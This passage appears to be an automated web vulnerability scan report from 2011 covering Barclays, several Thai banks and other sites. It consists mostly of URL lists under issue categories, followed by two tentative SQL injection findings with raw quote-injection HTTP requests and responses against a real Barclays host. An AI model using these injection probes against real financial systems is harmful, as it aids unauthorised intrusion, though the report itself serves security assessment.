26.85. http://www.mindworkscorp.com/

26.86. http://www.mindworkscorp.com/bio.html

26.87. http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni/_js/jQuery.inlinePager.js

26.88. http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni/_js/jquery.paginator.js

26.89. http://www.nbcuniversalstore.com/js/omniture/s_code_dageneral.js

26.90. http://www.nbcuniversalstore.com/nbcuniversalstore/behavior/typeface-0.15.js

26.91. https://www.scbbusinessnet.com/cs70_banking/js/jquery.mousewheel.js

26.92. https://www.scbbusinessnet.com/cs70_banking/news/Scripts/jquery.mousewheel.js

26.93. http://www.set.or.th/en/contact/contact.html

26.94. http://www.set.or.th/en/news/issuer_activities/ipo_showcase/set_ipo_showcase_p1.html

26.95. http://www.set.or.th/en/sitemap/for_listing.html

26.96. http://www.set.or.th/highlight/pr-th.html

26.97. http://www.set.or.th/scripts/JSCookMenu.js

26.98. http://www.zlmc.org/

26.99. http://www.zlmc.org/mindfulness-meditation.html

26.100. http://www2.itt-tech.edu/CFIDE/scripts/cfform.js

26.101. http://www2.itt-tech.edu/it/d/applynow/

27. Private IP addresses disclosed

27.1. http://get.adobe.com/flashplayer/

27.2. http://moneytalk.scb.co.th/

27.3. http://static.ak.fbcdn.net/rsrc.php/v1/yZ/r/CormVv6JMOl.js

27.4. http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/g5ZRpvzi0gh.css

27.5. http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js

27.6. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/wFcdvtg8yWA.js

27.7. http://static.ak.fbcdn.net/rsrc.php/v1/zy/r/-cydlOAMbwG.png

27.8. http://www.facebook.com/campaign/landing.php

27.9. http://www.facebook.com/extern/login_status.php

27.10. http://www.facebook.com/extern/login_status.php

27.11. http://www.facebook.com/extern/login_status.php

27.12. http://www.facebook.com/pages/KTB-Care/178373518915

27.13. http://www.facebook.com/plugins/like.php

27.14. http://www.facebook.com/plugins/like.php

27.15. http://www.facebook.com/plugins/like.php

27.16. http://www.google.com/sdch/rU20-FBA.dct

27.17. http://www.set.or.th/

28. Credit card numbers disclosed

29. Robots.txt file

29.1. http://0.r.msn.com/

29.2. http://2-thai.com/bank.html/x22

29.3. http://318395.r.msn.com/

29.4. http://419.myfunforum.org/sutra724.php/x22

29.5. http://914188.r.msn.com/

29.6. http://a.unanimis.co.uk/fc.php

29.7. http://ad.doubleclick.net/adi/agt.nbcuni/homepage

29.8. http://ad.uk.doubleclick.net/activity

29.9. http://adfarm.mediaplex.com/ad/bk/7648-49630-3840-0

29.10. http://admin.instantservice.com/resources/smartbutton/6192/II_Servers.js

29.11. https://adwords.google.com/select/Login

29.12. http://answers.yahoo.com/question/index

29.13. http://api.bing.com/qsonhs.aspx

29.14. http://api.recaptcha.net/js/recaptcha_ajax.js

29.15. http://apps.barclays.co.uk/accessibility/

29.16. https://apps.barclays.co.uk/webchat/invite_background.jpg/u0022

29.17. http://b.scorecardresearch.com/b

29.18. http://banner2.set.or.th/www/delivery/afr.php

29.19. https://center.ktam.co.th/

29.20. http://cspix.media6degrees.com/orbserv/hbpix

29.21. http://de.wikipedia.org/wiki/Liste_der_Banken_in_Thailand

29.22. http://dev.piwik.org/trac/browser/trunk/js/piwik.js

29.23. http://dis.us.criteo.com/dis/dis.aspx

29.24. http://docs.google.com/

29.25. http://domdex.com/f

29.26. http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

29.27. http://en.m.wikipedia.org/wiki

29.28. http://en.wikipedia.org/wiki/List_of_banks_in_Thailand

29.29. https://eprocurement.ktb.co.th/

29.30. https://feedback.live.com/default.aspx

29.31. http://feeds.bbci.co.uk/news/rss.xml

29.32. http://financial-services-summarize-the-web.blogspot.com/2011/04/in-exchange-rate-bangkok-bank-exchange.html/x22

29.33. http://go.microsoft.com/fwlink/

29.34. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1045272592/

29.35. http://ipinfusion.com/products/data_sheets.html

29.36. http://ja.wikipedia.org/wiki/????????覧

29.37. http://jquery.org/license

29.38. http://jqueryui.com/about

29.39. http://ktbcare.hi5.com/

29.40. http://l.addthiscdn.com/live/t00/250lo.gif

29.41. http://mail.google.com/mail/

29.42. http://meta.wikimedia.org/w/index.php

29.43. http://metrics.seenon.com/b/ss/delagentnbc,delagentglobalrollup/1/H.17/s25651625484430

29.44. http://mls.marchex.com/c

29.45. http://news.bbc.co.uk/2/hi/help/rss/4498287.stm

29.46. http://news.google.com/news/story

29.47. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

29.48. http://now.eloqua.com/visitor/v200/svrGP.aspx

29.49. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22

29.50. http://onlinehelp.microsoft.com/en-US/bing/ff808506.aspx

29.51. http://pagead2.googlesyndication.com/pagead/imgad

29.52. http://picasaweb.google.com/lh/view

29.53. http://piwik.org/

29.54. http://plugins.jquery.com/node/1208]

29.55. http://randomfactsthailand.com/thailand-breast-slap-sudden-breast-growth-without-surgery/x22

29.56. http://s7.addthis.com/static/r07/sh41.html

29.57. http://safebrowsing.clients.google.com/safebrowsing/downloads

29.58. http://scriptlogiccorp.d2.sc.omtrdc.net/b/ss/slcproduction/1/H.22.1/s27267301290655

29.59. http://sdc.bot.or.th/dcsw4pwnjm3f3ymhgt6lphzp1_5v7q/dcs.gif

29.60. http://search.yahoo.com/mrss/

29.61. https://secure.wikimedia.org/

29.62. http://sorgalla.com/jcarousel/

29.63. http://stackoverflow.com/questions/467336

29.64. http://th.linkedin.com/in/narongchai

29.65. http://th.wikipedia.org/wiki/ราย?ื?อ??า?าร???ระ??ศ??ย

29.66. http://thailandforvisitors.com/general/holidays/x22

29.67. http://toolbarqueries.clients.google.com/tbproxy/af/query

29.68. http://topics.nytimes.com/top/news/business/

29.69. http://translate.google.com/translate_t

29.70. http://translatewiki.net/wiki/MediaWiki:Collapsible-collapse/en

29.71. http://trends.atipat.co.cc/thailand-breast-slap/x22

29.72. http://tv.popcrunch.com/snl-commercials-barkleys-bank-peepers-insurance-video/

29.73. http://twitter.com/ktb_care

29.74. http://v13.lscache4.googlevideo.com/videoplayback

29.75. http://validator.w3.org/check

29.76. http://video.google.com/videoplay%3Fdocid%3D4479130566581116930&rct=j&sa=X&ei=qeq_Tfr2CsOTtweWz5GlBQ&ved=0CG4QwQ0&q=Krung+Thai+Bank&usg=AFQjCNFRaUm-pTmcyp71nTEaQ8bjdxaWkg/x22

29.77. http://webcache.googleusercontent.com/search

29.78. http://webmail.aol.com/

29.79. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London

29.80. http://wikimediafoundation.org/wiki/Special:Landingcheck

29.81. http://wikipediareview.com/index.php

29.82. http://www.360travelguide.com/travel_guides.asp/x26amp

29.83. http://www.adobe.com/shockwave/download/download.cgi

29.84. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp

29.85. http://www.barclays.com/privacy/com_privacy.html

29.86. http://www.bot.or.th/english/

29.87. http://www.coolthaihouse.com/forum/viewtopic.php

29.88. http://www.facebook.com/plugins/like.php

29.89. http://www.google-analytics.com/__utm.gif

29.90. http://www.google.com/search

29.91. https://www.google.com/accounts/ServiceLogin

29.92. http://www.googleadservices.com/pagead/conversion/1045272592/

29.93. http://www.independent.co.uk/news/world/asia/x26amp

29.94. http://www.mindworkscorp.com/

29.95. http://www.multimap.com/clients/places.cgi

29.96. http://www.nbcuniversalstore.com/nbcuniversalstore/behavior/ajaxConfig1.js

29.97. http://www.newsroom.barclays.com/content/Detail.aspx

29.98. http://www.scriptlogic.com/sem/g/content/pt-wireless/070610

29.99. http://www.sedoparking.com/search/registrar.php

29.100. http://www.thailandhotelforums.com/forum/index.php

29.101. http://www.youtube.com/results

29.102. http://www.zlmc.org/mindfulness-meditation.html

30. Cacheable HTTPS response

30.1. https://apps.barclays.co.uk/chatl19mV7j/_web6Tfs5lJV6xM.php/u0027,/u0027chatclient/u0027,/u0027width=640,height=480,scrollbars=0/u0027

30.2. https://csc.scb.co.th/

30.3. https://csc.scb.co.th/webclient1/bcm_signin.jsp

30.4. https://csc.scb.co.th/webclient1/cllcntr_en.jsp

30.5. https://csc.scb.co.th/webclient1/index.jsp

30.6. https://dimenxion.bangkokbank.com/bonprd/js/statusbar.js

30.7. https://ebank.kasikornbankgroup.com/kbiznet/login.html

30.8. https://eprocurement.ktb.co.th/

30.9. https://ksupplychain.kasikornbank.com/

30.10. https://secure.wikimedia.org/

30.11. https://www.barclaysfantasyfundmanager.co.uk/

30.12. https://www.bizpayment.ktb.co.th/epayview/

30.13. https://www.ktb.co.th/internetservice/onlineAccountAction.do

30.14. https://www.newcb.ktb.co.th/

30.15. https://www.scbbusinessnet.com/cs70_banking/js/bank-online.html

30.16. https://www.scbbusinessnet.com/cs70_banking/js/scb-quick-link.html

30.17. https://www.scbbusinessnet.com/cs70_banking/news/css/style.txt

30.18. https://www.scbbusinessnet.com/cs70_banking/news/en/scbbus-home-des.html

30.19. https://www.scbeasy.com/1st_pg.html

31. HTML does not specify charset

31.1. https://apps.barclays.co.uk/chatl19mV7j/_web6Tfs5lJV6xM.php/u0027,/u0027chatclient/u0027,/u0027width=640,height=480,scrollbars=0/u0027

31.2. https://csc.scb.co.th/

31.3. https://feedback.live.com/default.aspx

31.4. http://home.controlcase.com/piwik/piwik.php

31.5. https://ibank.barclays.co.uk/olb/w/BasicAccessStart.do

31.6. https://ibank.barclays.co.uk/olb/w/FeedbackOverview.do

31.7. https://ibank.barclays.co.uk/olb/w/ForgottenCardReaderBusiness.do

31.8. https://ibank.barclays.co.uk/olb/w/IndividualSavingsAcctOverview.do

31.9. https://ibank.barclays.co.uk/olb/w/LoanOverview.do

31.10. https://ibank.barclays.co.uk/olb/w/LoginMember.do

31.11. https://ibank.barclays.co.uk/olb/w/MobiLoginMember.do

31.12. https://ibank.barclays.co.uk/olb/w/ReorderPasscodeStandalone.do

31.13. https://ibank.barclays.co.uk/olb/w/TakeonPersonal.do

31.14. https://ibank.barclays.co.uk/olb/w/ViewEStatementHistoryStep1.do

31.15. https://icustody.bangkokbank.com/favicon.ico

31.16. https://ifunds.bangkokbank.com/favicon.ico

31.17. https://ipay.bangkokbank.com/bblscenroll/Resources/privacy.html+Bangkok+Bank+Internet+Log/x26amp

31.18. http://jqueryui.com/about

31.19. http://jscrollpane.kelvinluck.com/

31.20. https://ksupplychain.kasikornbank.com/

31.21. http://m1645.ic-live.com/515/

31.22. http://moneytalk.scb.co.th/

31.23. http://moneytalk.scb.co.th/en/

31.24. http://moneytalk.scb.co.th/en/include/bank-online.html

31.25. http://moneytalk.scb.co.th/en/include/footer.html

31.26. http://moneytalk.scb.co.th/en/include/scb-quick-link.html

31.27. http://moneytalk.scb.co.th/th/include/bank-online.html

31.28. http://moneytalk.scb.co.th/th/include/footer.html

31.29. http://moneytalk.scb.co.th/th/include/scb-quick-link.html

31.30. http://now.eloqua.com/visitor/v200/svrGP.aspx

31.31. http://register2.set.or.th/

31.32. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp

31.33. http://www.barclays.com/importantinfo/

31.34. http://www.kasikornbank.com/Pages/truehitsstat.html

31.35. http://www.ktam.co.th/media_box.php

31.36. http://www.mindworkscorp.com/

31.37. http://www.mindworkscorp.com/bio.html

31.38. https://www.scb-fx.com/

31.39. https://www.scb-fx.com/favicon.ico

31.40. http://www.scbbusinessnet.com/

31.41. https://www.scbbusinessnet.com/cs70_banking/js/bank-online.html

31.42. https://www.scbbusinessnet.com/cs70_banking/js/scb-quick-link.html

31.43. http://www.scbeasy.com/

31.44. http://www.set.or.th/

31.45. http://www.set.or.th/en/contact/index.html

31.46. http://www.thailandguru.com/thailand-baht-money-transfer-banking-accounts.html#cards/x26amp

31.47. http://www.zlmc.org/membership.html

31.48. http://www22.glam.com/cTagsImg.act

32. HTML uses unrecognised charset

32.1. https://csc.scb.co.th/webclient1/bcm_signin.jsp

32.2. https://csc.scb.co.th/webclient1/cllcntr_en.jsp

32.3. https://csc.scb.co.th/webclient1/index.jsp

32.4. https://ebank.kasikornbankgroup.com/kbiznet/login.html

32.5. https://eprocurement.ktb.co.th/

32.6. https://ibanking.bangkokbank.com/

32.7. https://ibanking.bangkokbank.com/BiB/index.html

32.8. https://ifunds.bangkokbank.com/Login.aspx

32.9. http://marketdata.set.or.th/head-en.html

32.10. http://marketdata.set.or.th/mkt/topten.do

32.11. http://marketdata.set.or.th/shortcut-en.html

32.12. http://marketdata.set.or.th/static/market/set/indextab_en_US.html

32.13. http://moneytalk.scb.co.th/

32.14. http://moneytalk.scb.co.th/index.asp

32.15. https://online.kasikornbankgroup.com/K-Online/ib/login_en.jsp

32.16. http://register2.set.or.th/semreg/detail.aspx

32.17. http://register2.set.or.th/semreg/enroll.aspx

32.18. http://rtradeinfo.bualuang.co.th/tradinginfo.services/price_update.php

32.19. http://sorgalla.com/

32.20. http://sorgalla.com/jcarousel/

32.21. http://truehits.net/

32.22. http://truehits.net/stat.php

32.23. http://www.bangkokbank.com/_layouts/NR/BangkokBankWebApps/Email%20Registration/subscribe.asp

32.24. http://www.bangkokbank.com/_layouts/nr/AccountAccess/account.asp

32.25. http://www.bangkokbank.com/_layouts/nr/BangkokBankWebApps/BLSresearch/MainBLS.asp

32.26. http://www.bangkokbank.com/_layouts/nr/MajorRates/FXRatesRssEn.htm

32.27. http://www.bangkokbank.com/_layouts/nr/MajorRates/MainBannerRss.htm

32.28. http://www.business.barclays.co.uk/BRC1/jsp/brccontrol

32.29. http://www.ktam.co.th/en/alliance.php

32.30. http://www.ktam.co.th/en/declarationnav.php

32.31. http://www.ktam.co.th/en/index.php

32.32. http://www.ktam.co.th/en/index.php/a

32.33. http://www.ktam.co.th/en/index.php/declarationnav.php

32.34. http://www.ktam.co.th/en/index.php/ims/ads_csi300_2.gif

32.35. http://www.ktam.co.th/en/index.php/ims/b_ktam_news11.gif

32.36. http://www.ktam.co.th/en/index.php/ims/b_ktam_news12.gif

32.37. http://www.ktam.co.th/en/index.php/ims/b_ktam_news13.gif

32.38. http://www.ktam.co.th/en/index.php/ims/b_ktam_news21.gif

32.39. http://www.ktam.co.th/en/index.php/ims/b_ktam_news22.gif

32.40. http://www.ktam.co.th/en/index.php/ims/b_ktam_news23.gif

32.41. http://www.ktam.co.th/en/index.php/ims/b_nav11.gif

32.42. http://www.ktam.co.th/en/index.php/ims/b_nav12.gif

32.43. http://www.ktam.co.th/en/index.php/ims/b_nav13.gif

32.44. http://www.ktam.co.th/en/index.php/ims/b_nav21.gif

32.45. http://www.ktam.co.th/en/index.php/ims/b_nav22.gif

32.46. http://www.ktam.co.th/en/index.php/ims/b_nav23.gif

32.47. http://www.ktam.co.th/en/index.php/ims/bg_cr1.gif

32.48. http://www.ktam.co.th/en/index.php/ims/bg_head1.gif

32.49. http://www.ktam.co.th/en/index.php/ims/bg_mmenu01.gif

32.50. http://www.ktam.co.th/en/index.php/ims/bg_mmenu02.gif

32.51. http://www.ktam.co.th/en/index.php/ims/bg_search1.gif

32.52. http://www.ktam.co.th/en/index.php/ims/bt_about1.gif

32.53. http://www.ktam.co.th/en/index.php/ims/bt_agent1.gif

32.54. http://www.ktam.co.th/en/index.php/ims/bt_education_center1.gif

32.55. http://www.ktam.co.th/en/index.php/ims/bt_home2.gif

32.56. http://www.ktam.co.th/en/index.php/ims/bt_news1.gif

32.57. http://www.ktam.co.th/en/index.php/ims/bt_service1.gif

32.58. http://www.ktam.co.th/en/index.php/ims/cmd_search1.gif

32.59. http://www.ktam.co.th/en/index.php/ims/empty.gif

32.60. http://www.ktam.co.th/en/index.php/ims/h_download1.gif

32.61. http://www.ktam.co.th/en/index.php/ims/h_link1.gif

32.62. http://www.ktam.co.th/en/index.php/ims/i_acrobat.gif

32.63. http://www.ktam.co.th/en/index.php/ims/i_firefox.gif

32.64. http://www.ktam.co.th/en/index.php/ims/i_flash.gif

32.65. http://www.ktam.co.th/en/index.php/ims/i_winmedia.gif

32.66. http://www.ktam.co.th/en/index.php/ims/mails.png

32.67. http://www.ktam.co.th/en/index.php/ims/news.php

32.68. http://www.ktam.co.th/en/index.php/ims/p_flag_th.gif

32.69. http://www.ktam.co.th/en/index.php/ims/p_ktamnew.gif

32.70. http://www.ktam.co.th/en/index.php/ims/p_ktamonline.gif

32.71. http://www.ktam.co.th/en/index.php/ims/p_line001.gif

32.72. http://www.ktam.co.th/en/index.php/ims/p_line002.gif

32.73. http://www.ktam.co.th/en/index.php/ims/p_link01.gif

32.74. http://www.ktam.co.th/en/index.php/ims/p_link02.gif

32.75. http://www.ktam.co.th/en/index.php/ims/p_link03.gif

32.76. http://www.ktam.co.th/en/index.php/ims/p_link04.gif

32.77. http://www.ktam.co.th/en/index.php/ims/p_link05.gif

32.78. http://www.ktam.co.th/en/index.php/ims/p_link06.gif

32.79. http://www.ktam.co.th/en/index.php/ims/p_logo1.gif

32.80. http://www.ktam.co.th/en/index.php/ims/p_word1.gif

32.81. http://www.ktam.co.th/en/index.php/media_box.php

32.82. http://www.ktam.co.th/en/index.php/news.inc.php

32.83. http://www.ktam.co.th/en/index.php/news.php

32.84. http://www.ktam.co.th/en/index.php/self_discovery.php

32.85. http://www.ktam.co.th/en/index.php/style/news.php

32.86. http://www.ktam.co.th/en/index.php/style/page.txt

32.87. http://www.ktam.co.th/en/news.inc.php

32.88. http://www.ktam.co.th/pop_up.php

32.89. https://www.ktamsmarttrade.com/FrontWeb/Home/Login.aspx

32.90. https://www.ktb.co.th/internetservice/onlineAccountAction.do

32.91. https://www.newcb.ktb.co.th/

32.92. http://www.scb.co.th/scb_api/scbapi.jsp

32.93. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser

32.94. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/download

32.95. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/information

32.96. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/logon_th

32.97. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/securetip

32.98. http://www.set.or.th/en/contact/contact.html

32.99. http://www.set.or.th/en/index.html

32.100. http://www.set.or.th/en/integrated-set.html

32.101. http://www.set.or.th/en/news/issuer_activities/ipo_showcase/set_ipo_showcase_p1.html

32.102. http://www.set.or.th/en/products/index/setindex_p1.html

32.103. http://www.set.or.th/en/regulations/cg/roles_p1.html

32.104. http://www.set.or.th/en/sitemap/for_listing.html

32.105. http://www.set.or.th/head-en.html

32.106. http://www.set.or.th/highlight/info_en.html

32.107. http://www.set.or.th/highlight/info_th.html

32.108. http://www.set.or.th/highlight/pr-th.html

32.109. http://www.set.or.th/highlight/release_en_US.html

32.110. http://www.set.or.th/nicepage_404.html

32.111. http://www.set.or.th/set/oppdaybyperiod.do

32.112. http://www.set.or.th/shortcut-en.html

32.113. http://www.set.or.th/shortcut-th.html

32.114. http://www.set.or.th/static/news/latestnews_en_US.html

32.115. http://www.set.or.th/static/news/latestnews_th_TH.html

32.116. http://www.set.or.th/th/index.html

32.117. http://www.set.or.th/th/integrated-set.html

32.118. http://www.thailandhotelforums.com/forum/index.php

33. Content type incorrectly stated

33.1. https://feedback.live.com/default.aspx

33.2. http://group.barclays.com/assets/img/icons/favicon.ico

33.3. http://group.barclays.com/cs/Satellite

33.4. http://group.barclays.com/html_phase_2/assets/css/fonts/expertsans-light-webfont.eot

33.5. http://group.barclays.com/html_phase_2/assets/css/fonts/expertsans-light-webfont.woff

33.6. http://group.barclays.com/html_phase_2/assets/css/fonts/expertsans-regular-webfont.eot

33.7. http://group.barclays.com/html_phase_2/assets/css/fonts/expertsans-regular-webfont.woff

33.8. http://lvs.truehits.in.th/goggen.php

33.9. http://meta.wikimedia.org/w/index.php

33.10. http://moneytalk.scb.co.th/css/style.txt

33.11. http://moneytalk.scb.co.th/css/style_th.txt

33.12. http://moneytalk.scb.co.th/en/include/bank-online.html

33.13. http://moneytalk.scb.co.th/en/include/scb-quick-link.html

33.14. http://moneytalk.scb.co.th/th/include/bank-online.html

33.15. http://moneytalk.scb.co.th/th/include/footer.html

33.16. http://moneytalk.scb.co.th/th/include/scb-quick-link.html

33.17. http://now.eloqua.com/visitor/v200/svrGP.aspx

33.18. http://rtradeinfo.bualuang.co.th/tradinginfo.services/css/bbl_style.css

33.19. http://sedoparking.com/r/ads/adcode.js

33.20. http://tc.barclays.co.uk/c

33.21. http://www.bangkokbank.com/Bangkok%20Bank/Pages/Forms/AllItems.aspx

33.22. http://www.bangkokbank.com/Bangkok%20Bank/_layouts/Authenticate.aspx

33.23. http://www.bangkokbank.com/Bangkok%20Bank/_layouts/viewlsts.aspx

33.24. http://www.bangkokbank.com/Online%20Banking/For%20Personal/iBanking/Pages/Forms/AllItems.aspx

33.25. http://www.bangkokbank.com/_layouts/NR/BangkokBank/images/homepage/Feature_chinese.jpg

33.26. http://www.bangkokbank.com/_layouts/nr/MajorRates/ratebanner.css

33.27. http://www.barclays.co.uk/cs/Satellite

33.28. http://www.barclays.co.uk/images/premier_league_masthead.jpg

33.29. http://www.facebook.com/extern/login_status.php

33.30. http://www.google.com/search

33.31. http://www.kasikornbank.com/SiteCollectionDocuments/scripts/start.js

33.32. http://www.ktam.co.th/en/news.inc.php

33.33. http://www.ktam.co.th/en/style/page.txt

33.34. http://www.ktam.co.th/media_box.php

33.35. http://www.ktb.co.th/flash/a1.swf

33.36. http://www.ktb.co.th/flash/a2.swf

33.37. http://www.ktb.co.th/flash/a3.swf

33.38. http://www.ktb.co.th/flash/b1.swf

33.39. http://www.ktb.co.th/flash/b2.swf

33.40. http://www.ktb.co.th/flash/b3.swf

33.41. http://www.ktb.co.th/flash/c1.swf

33.42. http://www.ktb.co.th/flash/c2.swf

33.43. http://www.ktb.co.th/flash/c3.swf

33.44. http://www.ktb.co.th/flash/d1.swf

33.45. http://www.ktb.co.th/flash/d2.swf

33.46. http://www.ktb.co.th/flash/d3.swf

33.47. http://www.ktb.co.th/flash/e1.swf

33.48. http://www.ktb.co.th/flash/e2.swf

33.49. http://www.ktb.co.th/flash/e3.swf

33.50. http://www.ktb.co.th/flash/f1.swf

33.51. http://www.ktb.co.th/flash/f2.swf

33.52. http://www.ktb.co.th/flash/f3.swf

33.53. http://www.ktb.co.th/flash/home_show_flash1.swf

33.54. http://www.ktb.co.th/flash/home_show_flash2.swf

33.55. http://www.ktb.co.th/flash/home_show_flash3.swf

33.56. http://www.ktb.co.th/flash/ktb_group_eng.swf

33.57. http://www.ktb.co.th/flash_eng/ktbslide_index.swf

33.58. http://www.nbcuniversalstore.com/nbcuniversalstore/layout/favicon.ico

33.59. http://www.scb.co.th/favicon.ico

33.60. https://www.scbbusinessnet.com/cs70_banking/js/bank-online.html

33.61. https://www.scbbusinessnet.com/cs70_banking/js/scb-quick-link.html

33.62. https://www.scbbusinessnet.com/cs70_banking/news/css/style.txt

33.63. http://www.scriptlogic.com/_commonfiles/controls/omniturizer.aspx

33.64. http://www.set.or.th/menuFile/topMenu2009-th.js

33.65. http://www.zlmc.org/membership.html

33.66. http://www22.glam.com/cTagsImg.act

34. Content type is not specified

34.1. http://propertyforsale.kasikornbank.com/PropertyForSaleAnnouncement/1,2098,,00.html

34.2. http://www.bangkokbank.com/Online%20Banking/For%20Personal/iBanking/Pages/1

34.3. http://www.bangkokbank.com/bangkok%20bank/pages/blank.gif

34.4. http://www.bangkokbank.com/favicon.ico

34.5. http://www.bangkokbank.com/layouts/NR/BangkokBank/images/homepage/head_line.gif

34.6. http://www.bangkokbank.com/online%20banking%20thai/for%20business/biz%20ibanking/pages/1

34.7. http://www.barclays.co.uk/images/popup_green.gif

34.8. http://www.bot.or.th/favicon.ico

34.9. http://www.bot.or.th/x26amp



1. SQL injection  next
There are 15 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://group.barclays.com/assets/script/webtrends-del.js [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://group.barclays.com
Path:   /assets/script/webtrends-del.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /assets'/script/webtrends-del.js HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 03 May 2011 13:16:38 GMT
Set-Cookie: JSESSIONID=71CDD23445113C60B2CB06C94195620D.tomcat_1_1; Path=/cs
Content-Type: text/html;charset=UTF-8
Content-Length: 1060
Connection: close

<html><head><title>Apache Tomcat/6.0.32 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

Request 2

GET /assets''/script/webtrends-del.js HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:16:39 GMT
Set-Cookie: JSESSIONID=6ACE2F0F7472083BE62948B07BAC43AB.tomcat_2_1; Path=/cs
Cache-Control: no-store
Last-Modified: Tue, 03 May 2011 13:16:39 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 21260


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-gb" xml:lang="en-gb"
...[SNIP]...

1.2. http://group.barclays.com/html_phase_2/assets/css/styles.min.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://group.barclays.com
Path:   /html_phase_2/assets/css/styles.min.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /html_phase_2/assets'/css/styles.min.css HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 03 May 2011 13:17:15 GMT
Set-Cookie: JSESSIONID=D81550F023755505F38643106E91441F.tomcat_2_1; Path=/cs
Content-Type: text/html;charset=UTF-8
Content-Length: 1060
Connection: close

<html><head><title>Apache Tomcat/6.0.32 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

Request 2

GET /html_phase_2/assets''/css/styles.min.css HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:17:16 GMT
Set-Cookie: JSESSIONID=67E752F3A2B61A44311FA1405758F214.tomcat_2_1; Path=/cs
Cache-Control: no-store
Last-Modified: Tue, 03 May 2011 13:17:16 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 21260


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-gb" xml:lang="en-gb"
...[SNIP]...

